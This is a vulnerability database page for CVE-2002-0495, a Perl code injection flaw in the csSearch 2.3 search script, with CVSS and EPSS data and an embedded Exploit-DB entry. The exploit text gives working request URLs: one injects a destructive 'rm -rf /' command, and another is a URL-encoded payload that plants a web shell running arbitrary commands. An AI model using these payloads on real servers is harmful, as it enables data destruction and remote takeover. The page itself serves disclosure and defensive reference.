English
Français
Light
Dark
System

Alert System

Stay informed at all times
Create an account Open a free account Login Manage your alerts

CVE-2002-0495 : Detail

CVE-2002-0495

Code Injection
A03-Injection
2.65%V3
Network
2003-04-02 03:00 +00:00
2002-06-15 07:00 +00:00
CVE.org
NVD

Alert for a CVE

Stay informed of any changes for a specific CVE.
Alert management

Descriptions

csSearch.cgi in csSearch 2.3 and earlier allows remote attackers to execute arbitrary Perl code via the savesetup command and the setup parameter, which overwrites the setup.cgi configuration file that is loaded by csSearch.cgi.

Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-94 Improper Control of Generation of Code ('Code Injection')
The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

Metrics

Metric Score Severity CVSS Vector Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 21354

Publication date : 2002-03-25 23:00 +00:00
Author : Steve Gustin
EDB Verified : Yes

source: https://www.securityfocus.com/bid/4368/info csSearch is a website search script, written in Perl. It will run on most Unix and Linux variants, as well as Microsoft operating systems. csSearch is prone to an issue which may enable an attacker to execute Perl code with the privileges of the webserver process. For exploitation to be successful, the attacker must pass properly URL encoded Perl code in CGI parameters via a web request. For example: http://host/cgi-bin/csSearch.cgi?command=savesetup&setup=PERL_CODE_HERE Configuration data is saved with the following URL. Note that any perl code would need to be URL encoded. csSearch.cgi?command=savesetup&setup=PERL_CODE_HERE For example, the classic "rm -rf /" example would be as follows: csSearch.cgi?command=savesetup&setup=`rm%20-rf%20/` Here's something a little more interesting, less than 300 bytes of code that turns csSearch into a remote web shell of sorts. *ShowSearchForm = *Login = sub { print "
Enter Command (eg: ls -l)
"; print " "; print "
"; $in{'cmd'} && print `$in{'cmd'} 2>&1`; exit; }; URL Encoded as: csSearch.cgi?command=savesetup&setup=*ShowSearchForm%3D*Login%3Dsub{print"<form+method%3Dpost+action%3DcsSearch.cgi>Enter+Comm and+(example:+ls+-l)<br><input+type%3Dtext+name%3Dcmd+size%3D99>+<input+type%3Dsubmit+value%3DExecute><hr><xmp>";$in{'cmd'}%26 %26print`$in{'cmd'}+2>%261`;exit;};</div> <div class="separator my-10"></div> <h3>Products Mentioned</h3> <h4>Configuraton 0</h4><p>Cgiscript>>Cssearch_professional >> Version To (including) 2.3<ul><li style='margin-left:20px;'>Cgiscript>>Cssearch_professional >> Version 2.3<a href='/en/cpe/63A37738-9527-4660-AF5B-A8C38C4C9D36.html'> (Open CPE detail)</a></li></ul></p> <div class="separator my-10"></div> <h3>References</h3><div style='margin-bottom: 10px;'><a href='http://www.securityfocus.com/bid/4368' target='_blank'>http://www.securityfocus.com/bid/4368 <i class="ki-duotone ki-exit-right-corner" style="font-size: 10px;vertical-align:8px"><span class="path1"></span><span class="path2"></span></i></a><br><span style='margin-left:20px;'>Tags : vdb-entry, x_refsource_BID</span></div><div style='margin-bottom: 10px;'><a href='http://www.cgiscript.net/cgi-script/csNews/csNews.cgi?database=cgi.db&command=viewone&id=7' target='_blank'>http://www.cgiscript.net/cgi-script/csNews/csNews.cgi?database=cgi.db&command=viewone&id=7 <i class="ki-duotone ki-exit-right-corner" style="font-size: 10px;vertical-align:8px"><span class="path1"></span><span class="path2"></span></i></a><br><span style='margin-left:20px;'>Tags : x_refsource_MISC</span></div><div style='margin-bottom: 10px;'><a href='http://www.iss.net/security_center/static/8636.php' target='_blank'>http://www.iss.net/security_center/static/8636.php <i class="ki-duotone ki-exit-right-corner" style="font-size: 10px;vertical-align:8px"><span class="path1"></span><span class="path2"></span></i></a><br><span style='margin-left:20px;'>Tags : vdb-entry, x_refsource_XF</span></div><div style='margin-bottom: 10px;'><a href='http://www.securityfocus.com/archive/1/264169' target='_blank'>http://www.securityfocus.com/archive/1/264169 <i class="ki-duotone ki-exit-right-corner" style="font-size: 10px;vertical-align:8px"><span class="path1"></span><span class="path2"></span></i></a><br><span style='margin-left:20px;'>Tags : mailing-list, x_refsource_BUGTRAQ</span></div><div class="separator my-10"></div> </div> </div> </div> </div> </div> </div> <script type="application/ld+json"> { "@context": "https://schema.org", "@type": "NewsArticle", "headline": "Information about the CVE-2002-0495 vulnerability.", "datePublished": "2003-04-02T03:00:00+00:00", "dateModified": "2002-06-15T07:00:00+00:00", "author": [{ "@type": "Organization", "name": "The MITRE Corporation", "url": "https://www.cve.org" },{ "@type": "Organization", "name": "CVE Find", "url": "https://www.cvefind.com" }] } </script> <!--end::Container--> <!--begin::Footer--> <div class="footer py-4 d-flex flex-lg-column" id="kt_footer"> <div class="container-xxl d-flex flex-column flex-md-row align-items-center justify-content-between"> <div class="text-gray-900 order-2 order-md-1"> <span class="text-muted fw-semibold me-1">2024&copy;</span> <a href="https://www.tesweb.com" target="_blank" class="text-gray-800 text-hover-primary">tesweb SA</a> </div> <ul class="menu menu-gray-600 menu-hover-primary fw-semibold order-1"> <li class="menu-item"> <a href="/en/official.html" class="menu-link px-2">Database Partners</a> </li> <li class="menu-item"> <a href="/en/gdpr.html" class="menu-link px-2">GDPR</a> </li> <li class="menu-item"> <a href="/en/contact.html" class="menu-link px-2">Contact</a> </li> <li class="menu-item"> <a href="/en/plan-price.html" class="menu-link px-2">Purchase</a> </li> <li class="menu-item"> <a href="https://www.linkedin.com/company/cve-find/" class="menu-link px-2" target="_blank"><img src="/media/social/linkedin.svg" width="40" height="40"/></a> </li> <li class="menu-item"> <a href="https://www.facebook.com/people/CVE-Find-Alert/61561116452093/" class="menu-link px-2" target="_blank"><img src="/media/social/facebook.svg" width="40" height="40"/></a> </li> <li class="menu-item"> <a href="https://x.com/cvefindcom" class="menu-link px-2" target="_blank"><img src="/media/social/twitter.svg" width="40" height="40"/></a> </li> </ul> </div> </div> </div> </div> </div> <div id="gdpr" style="background: linear-gradient(0deg, rgba(56,63,72,1) 0%, rgba(56,63,72,0.7) 100%);position: fixed;bottom:0;width: 100%;z-index:9999;padding:8px;color:white;"> <div class="row" style=""> <div class="col-md-2"> <div class="form-check form-switch form-check-custom form-check-solid"> <input class="form-check-input" type="checkbox" value="" name="gdprswitchall" data-tesweb="all" checked="checked" /> <label class="form-check-label" for="flexSwitchChecked"> Accept all </label> </div> </div> <div class="col-md-2" style="text-align:center;"> <button type="button" class="btn btn-light-primary" id="closeGdpr"> <i class="ki-duotone ki-cross"><span class="path1"></span><span class="path2"></span></i> Close</button> <br> <a href="/en/gdpr.html" title="GDPR" style="color:white;">More information</a> </div> <div class="col-md-8"> <span data-tesweb-action="accepte" style="display:none">Click on the button to the left (OFF), to authorize the inscription of cookie improving the functionalities of the site.</span> <span data-tesweb-action="noaccepte" style="display:none">Click on the button to the left (Accept all), to unauthorize the inscription of cookie improving the functionalities of the site.</span> </div> </div> </div> <!--begin::Javascript--> <script>var hostUrl = "assets/";</script> <!--begin::Global Javascript Bundle(mandatory for all pages)--> <script src="/plugins/global/plugins.bundle.js"></script> <script src="/js/scripts.bundle.js"></script> <!--end::Global Javascript Bundle--> <script src="/js/app/custom.js"></script> <script src="/js/app/base.js.php"></script> <!--begin::Vendors Javascript(used for this page only)--> <script src='https://www.cvefind.com/plugins/custom/datatables/datatables.bundle.js'></script> <script src='https://www.cvefind.com/js/app/bloc/cve/epss.js'></script> <script src='https://www.cvefind.com/js/aceeditor/ace.js'></script> <script src='https://www.cvefind.com/js/app/bloc/cve/exploitdb.js'></script> <script src="/js/app/account/manageAlertNeedAccount.js"></script> <!--end::Custom Javascript--> <!-- Specific Page JS --> <!-- Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=G-BK1SCP8YYK"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-BK1SCP8YYK'); </script> <!--end::Javascript--> </body> </html>